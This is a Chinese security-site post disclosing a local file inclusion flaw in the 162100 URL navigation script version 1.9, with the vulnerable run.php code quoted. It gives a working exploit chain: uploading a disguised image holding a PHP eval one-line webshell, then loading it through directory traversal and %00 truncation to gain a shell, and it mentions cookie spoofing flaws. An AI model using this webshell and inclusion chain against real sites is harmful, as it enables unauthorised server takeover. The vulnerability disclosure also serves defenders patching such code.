首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
162100网址导航1.9本地文件包含漏洞
来源:http://www.tools.net/ 作者:陆羽 发布时间:2010-10-28  

破程序破漏洞,但是为了鼓励大家学习,还是发出来了。。。拒绝恶意破坏!

程序官方:http://download.162100.com

admin 目录下 run.php 文件部分代码如下: 我找到上传目录

editor/index.html

使用上传图片功能,上传一个1.jpg 内容为 <?php eval($_POST[cmd])?>

获得地址editor/images/upload/2010102718265325.jpg

然后admin/run.php?run=../../editor/images/upload/2010102718265325.jpg%00

就是一个一句话了。。。剩下的你懂的。。。

1 <?php
2 if($_REQUEST['run'] && file_exists('./run/'.$_REQUEST['run'].'.php'))
3   require_once('./run/'.$_REQUEST['run'].'.php'); //这里判断只要文件存在,就可以包含,未做任何限制,可目录跳转,所以,只要能上传文件,然后%00截断,即可上传
4 else
5   alert('命令错误或功能尚未开通!','./index.html');
6 ?>




我就传一个phpinfo示意下吧。。。
一 一!虽然破程序。但是渗透时候难免遇到。。。希望大家也共享出来平时日站过程中无意挖的一些程序漏洞。共同学习。也节省更多的时间

这套程序还有cookies欺骗等其他漏洞。。。不过意义不太大。。。够用就行

首发tools 陆羽



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Discuz! 7.2以下版本及各uc产品a
·Discuz! 7.1 & 7.2 后台远程代码
·Discuz非创始人管理员代码执行
·phpcms2008本地文件包括及利用(
·shopxp html版2.0管理员添加漏洞
·Destoon B2B SQL注射 & 后台代码
·Phpwind 注入以及利用之二:文件
·6kbbs v8.0论坛两个漏洞
·ecshop2.72 api.php 文件鸡肋注
·ewebeditor 5.2 列目录漏洞
·PHP 5.x COM functions提权漏洞
·ewebeditor高版本>=5.5鸡肋0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved